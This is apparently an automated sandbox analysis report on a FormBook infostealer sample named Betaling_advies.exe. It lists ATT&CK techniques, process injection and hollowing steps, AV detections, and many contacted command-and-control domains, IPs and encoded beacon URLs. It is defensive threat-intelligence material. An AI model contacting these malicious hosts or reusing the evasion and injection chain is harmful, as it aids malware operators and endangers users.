Source: explorer.exe, 00000004.00000000.670564203.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected FormBook

Remote Access Functionality:

Yara detected FormBook

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API1 | Path Interception | Process Injection612 | Virtualization/Sandbox Evasion3 | OS Credential Dumping | Query Registry1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection612 | LSASS Memory | Security Software Discovery141 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Virtualization/Sandbox Evasion3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information2 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing11 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 383925
Sample: Betaling_advies.exe
Start date: 08/04/2021
Architecture: WINDOWS
Score: 100

Process tree with the per-node findings from the graph:

Start (node 2)
  DNS/IP: www.carsoncredittx.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures
  -> started Betaling_advies.exe (node 11)
     Dropped file: C:\Users\user\AppData\Local\...\571kzkbal.dll, PE32
     Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
     -> started Betaling_advies.exe (node 15)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        -> injected explorer.exe (node 18)
           DNS/IP: www.dfch18.com 156.241.53.253, 49771, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles; boulderhalle-hamburg.com 81.169.145.150, 49765, 80 STRATOSTRATOAGDE Germany; 22 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit)
           -> started colorcpl.exe (node 22)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              -> started cmd.exe (node 25)
                 -> started conhost.exe (node 27)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Betaling_advies.exe | 15% | ReversingLabs | Win32.Spyware.Noon

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.colorcpl.exe.4bd7960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.2.colorcpl.exe.2972508.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.Betaling_advies.exe.2680000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.Betaling_advies.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.Betaling_advies.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.dfch18.com/hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJu | 0% | Avira URL Cloud | safe
http://www.werealestatephotography.com/hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu | 0% | Avira URL Cloud | safe
https://www.werealestatephotography.com/hw6d/?DnbLu=um | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.kathyscrabhouse.com/hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
www.werealestatephotography.com/hw6d/ | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.specstrii.com/hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu | 100% | Avira URL Cloud | malware
http://www.thenewyorker.computer/hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu | 0% | Avira URL Cloud | safe
http://www.allwest-originals.com/hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu | 0% | Avira URL Cloud | safe
http://www.organicfarmteam.com/hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.osaka-computer.net/hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJu | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ladybugtubs.com | 34.102.136.180 | true | false | | unknown
www.werealestatephotography.com | 35.208.69.149 | true | true | | unknown
allwest-originals.com | 34.102.136.180 | true | false | | unknown
boulderhalle-hamburg.com | 81.169.145.150 | true | true | | unknown
specstrii.com | 34.102.136.180 | true | false | | unknown
osaka-computer.net | 107.178.109.19 | true | true | | unknown
www.carsoncredittx.com | 192.155.168.82 | true | false | | unknown
www.kathyscrabhouse.com | 192.187.111.219 | true | true | | unknown
td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | | unknown
parkingpage.namecheap.com | 198.54.117.218 | true | false | | high
www.neutrasystems.com | 52.128.23.153 | true | true | | unknown
www.dfch18.com | 156.241.53.253 | true | true | | unknown
www.ladybugtubs.com | unknown | unknown | true | | unknown
www.boulderhalle-hamburg.com | unknown | unknown | true | | unknown
www.osaka-computer.net | unknown | unknown | true | | unknown
www.allwest-originals.com | unknown | unknown | true | | unknown
www.thenewyorker.computer | unknown | unknown | true | | unknown
www.loanascustomboutique.com | unknown | unknown | true | | unknown
www.wellalytics.com | unknown | unknown | true | | unknown
www.themusasoficial.com | unknown | unknown | true | | unknown
www.specstrii.com | unknown | unknown | true | | unknown
www.organicfarmteam.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.dfch18.com/hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJu | true | Avira URL Cloud: safe | unknown
http://www.werealestatephotography.com/hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu | true | Avira URL Cloud: safe | unknown
http://www.kathyscrabhouse.com/hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu | true | Avira URL Cloud: safe | unknown
www.werealestatephotography.com/hw6d/ | true | Avira URL Cloud: safe | low
http://www.specstrii.com/hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu | false | Avira URL Cloud: malware | unknown
http://www.thenewyorker.computer/hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu | true | Avira URL Cloud: safe | unknown
http://www.allwest-originals.com/hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu | false | Avira URL Cloud: safe | unknown
http://www.organicfarmteam.com/hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu | false | Avira URL Cloud: safe | unknown
http://www.osaka-computer.net/hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJu | true | Avira URL Cloud: safe | unknown
http://www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu | true | Avira URL Cloud: safe | unknown

                                                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.litespeedtech.com/error-page | colorcpl.exe, 00000007.00000002.911472356.0000000004D52000.00000004.00000001.sdmp | false | | high
https://www.werealestatephotography.com/hw6d/?DnbLu=um | colorcpl.exe, 00000007.00000002.911472356.0000000004D52000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000004.00000000.655043939.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | low
http://www.fonts.com | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown

                                                                            Contacted IPs


                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.54.117.218 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
52.128.23.153 | www.neutrasystems.com | United States | 19324 | DOSARRESTUS | true
192.187.111.219 | www.kathyscrabhouse.com | United States | 33387 | NOCIXUS | true
107.178.109.19 | osaka-computer.net | United States | 53755 | IOFLOODUS | true
34.102.136.180 | ladybugtubs.com | United States | 15169 | GOOGLEUS | false
81.169.145.150 | boulderhalle-hamburg.com | Germany | 6724 | STRATOSTRATOAGDE | true
156.241.53.253 | www.dfch18.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
35.208.69.149 | www.werealestatephotography.com | United States | 19527 | GOOGLE-2US | true

                                                                            General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383925
Start date: 08.04.2021
Start time: 12:36:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 28s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Betaling_advies.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@15/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.4% (good quality ratio 19.3%)
• Quality average: 73.5%
• Quality standard deviation: 31.3%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                            • TCP Packets have been reduced to 100
                                                                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 104.43.139.144, 23.54.113.53, 13.88.21.125, 52.255.188.83, 168.61.161.212, 23.10.249.43, 23.10.249.26, 52.147.198.201, 23.0.174.185, 23.0.174.200, 52.155.217.156, 20.54.26.129
                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383925/sample/Betaling_advies.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            No simulations

                                                                            Joe Sandbox View / Context

                                                                            IPs

Match: 198.54.117.218

Associated Sample Name / URL | Detection | Context
PaymentAdvice.exe | malicious | www.enerav.com/c22b/?t8bHuTK=aEhNz1M5MwONSiBn/0vn4w/gCXHJ6jEF3X3HXryAuETgC+Myn95z7x6eSB6DSHN4Cngq&2d=lnvt
46578-TR.exe | malicious | www.kevinrsamuels.network/goei/?kfOdRJ=f9uvcKoleaXhAa+Mtcg3NtpkL3OawIA7ZGyED81dVKF6dE9d54Zy+1duc26jKxOfhZ46&jBZx=D8b4q
SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe | malicious | www.thehairtransplantliaison.com/qqeq/?UR-TRLn=46HGiVXtvGZ1o457vCIWGWOD0rk7gPAg1COzf9/s39+Y4ChpogYwPMQ24i1sYB9XjSps&P6u=Hb9l0TTXQ4NLhX
Swift001_jpg.exe | malicious | www.switcheo.finance/o9st/?KtClV=KhNCudCuas36niPBRfSjyKEtMLkkXOZQHLO8g5q+wgMU/BVTe4XuEXQf7/wtYyCblVuW&t8rL=FrghEXS
Payment_png.exe | malicious | www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp
9tRIEZUd1j.exe | malicious | www.thesixteenthround.net/aqu2/?5j=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7&_P=2dhtaH9
Gt8AN6GiOD.exe | malicious | www.boogerstv.com/p2io/?n8Ehjz3=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&JtxH=XPs0s4JPf
27hKPHrVa3.exe | malicious | www.boogerstv.com/p2io/?RR=YrKhZvg&rp=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM
Payment 9.10000 USD.exe | malicious | www.mondopeak.com/m8es/?dL3pv=B53Wf6M3JDAEan34e2a23JkFEJLcYp8ycOdfYrTy6dbNslo5+k2oC0PjjJDWZV/24+RN&BlL=8pdpXZ1po
Fully Executed Contract.xlsx | malicious | www.successandjoy.club/3ueg/?cFN=ErmXmMBIFtdewFC6O29iVXifVtX5lbM9ZC7kz+NOoNf32Keeuvv655T9v66BJ70e0flOVQ==&PBU=dpg8g
Inv.exe | malicious | www.a-zsolutionsllc.com/hko6/?NVxxVPJ=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXOfKoyPZ21p&Ch6LF=9rj0axC
IMG_7742_Scanned.doc | malicious | www.washabsorber.com/gypo/?UrjPuprX=Pn910w3l5D7RPWGrIfEjN0rd6RS+9oh5xbf6ZpHI5T1fuoOy87qGtS6g2RMAOlxWqznzEw==&nnLx=UBZp3XKPefjxdB
zMJhFzFNAz.exe | malicious | www.mediasupernova.com/idir/?zZ0lQ0=BBXoJm4OTOHApCp3fGSy0sEyLibn+67cOqzoDset7FTIXfnJGeAyh+7pO3MSwT6mb2mV&Wzr=H2MDx8O8kJn8f
InterTech_Inquiry.exe | malicious | www.chelseybalassi.com/pkfa/?UjRXl6T=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KB5y+kqtClQ&tVEp=1b60ITOxXh8hrzep
00278943.xlsx | malicious | www.coffreauxtissus.com/tmz/?Xrx4qhO=p1AOeEel+iKfzrJrX3ku4fFInusX5uqiRYnKoS72OyvSgvmqycsVhhJV/aISDmeQLKXuHQ==&dny8V=8p-t_j0XJnOLab
insz.exe | malicious | www.a-zsolutionsllc.com/hko6/?sDHh4=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p&Wr=M4nHMf1xX
Invoice Payment Details.exe | malicious | www.angermgmtathome.com/kio8/?PR-Hfnn=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHzLrSTP9HxKs&Cd8t=9rJx809H6RL0Cr7
order.exe | malicious | www.a-zsolutionsllc.com/hko6/?X2Mt66Xx=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGUiPWZu0eDc4L90DGg==&bly=TVThefOpdDy0
Z4bamJ91oo.exe | malicious | www.swavhca.com/jskg/?inKP_TF0=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLAzU62aITRdq&oneha=xPMpsZU8
zISJXAAewo.exe | malicious | www.pnorg.net/jskg/?X2JtLRIH=FFllKUI2Vy3AcuNhWrh4fKbis3luBqLkf2wubdQ4CJ+GPQXPDvWWudAI4bM3GwbQsdH4&blv=UVIpcz0pIRTp

Match: 52.128.23.153

Associated Sample Name / URL | Detection | Context
MACHINE SPECIFICATION.exe | malicious | www.whowealth.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGblUcnh8IKwh
50729032021.xlsx | malicious | www.aideliveryrobot.com/p2io/?LPRtv=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&SH=yzu8bdqp
MACHINE SPECIFICATIONS.exe | malicious | www.whowealth.com/rrrq/?ATxdA4s=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGYJufmNHL9RwStorzg==&4hO=uDHPhJIxONuPbDb
Shipping Documents C1216.exe | malicious | www.toosol.com/fhg5/?idFt5Lt8=Ml/ZzGIGF1FkdUWKp7YfLz5Vhr4JtQgw1RbjRUSw4ruSIMcEU2Te3R8sgnifklbnOlMaPd/2KQ==&TZ=EjUt0xR
9V3LjvhSMb.exe | malicious | www.digitalkn.com/jzvu/?p0D=mfTHKdP8fLydF&jL04ln=cEqLwIJ+aRwkZKINSQ3QvunM083gkoJjrLpUcp3aBa64+rAHYbkeaE3nOi790R8PidGw
RDAW-180-47D.exe | malicious | www.oleandrindrugs.com/fhg5/?k2Jdl2Q=OaXU6X18MvJ5q1qcJjJuK08JGFlriH0N3sFKML6er8coazWxslMzDpjffI6ofnfbT4O7&OZiLRb=AnG0VF1hLTBpLbaP
gV8xdP8bas.exe | malicious | www.wellnesssensation.com/bw82/?KX9ps=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&t6Ah=oBZx1ZuH5L
m5bCbJdk7l.exe | malicious | www.wellnesssensation.com/bw82/?9r=Cxl0GPu0O4YH8&lL08q=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==
xloa.exe | malicious | www.wellnesssensation.com/bw82/?cjlti=VTjl4FmxEtYHGD&FdR0zJRX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj
rbyB1UHXxR.exe | malicious | www.wellnesssensation.com/bw82/?jL34YR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&w0=mfJDabjXTrYll
4137.exe | malicious |
                                                                            • www.bsf.xyz/krc/?XPGx_BL8=oSG3T25g44YEqdHLNcXBvI98o2n2iP7ZIEUUkJplaCBty9zlxmxYbQ+JtR5ITo/P6k1v&5jrH=7n6ti6PHWBWtUvjp
                                                                            COAU7229898130.xlsxGet hashmaliciousBrowse
                                                                            • www.digitalkn.com/jzvu/?lf=cEqLwIJ7aWwgZaEBQQ3QvunM083gkoJjrLxEAqrbF665+asBfL1SMAPlNHXrwB48pebAWQ==&JreT=PJE0oxE
                                                                            RFQ_OB Jiefeng E&E Co Ltd.exeGet hashmaliciousBrowse
                                                                            • www.coursesnap.com/vxwp/?oN60n=aoI/2ttuUri1IfMVTWjSMRAkTYr7wua1r9tN8sGSVQKIq85GZ0w6gmxLUvfA/w2PCQdu&lbipbd=i48pk
                                                                            FB_1401_4_5,pdf.exeGet hashmaliciousBrowse
                                                                            • www.ypb.xyz/gh6n/?Jfy=Sqiid3V0km2wxmfK50/u5WHvN3QLl6P+VgZ6E7O0fsICj+IsRQ4glH473P9HMnWgDxHx&ndZHKd=R48xo
                                                                            55gfganfgF.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?_FQl2b=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==&oX9=Z0D4XL4pfLe8-hP
                                                                            QUOTATION00187612.exeGet hashmaliciousBrowse
                                                                            • www.condolence.xyz/nsk/?5juH1Lw=FYdOMEq/l0425zB2F165eTcCuV5zwQcH/ZXNrxlH4Hif5qg1IOYzj5CtMIOwqQ4asrXS&kxl0dL=nDH8a8R86Pb8o
                                                                            IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?9rjHF6y=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vohabTLMb1R2mnPA==&lX9d=p48hVnrp1tqPRT7P
                                                                            vB1Zux02Zf.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?9rn=Ch2H98AXZPNlB&jH5XY=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==
                                                                            vBugmobiJh.exeGet hashmaliciousBrowse
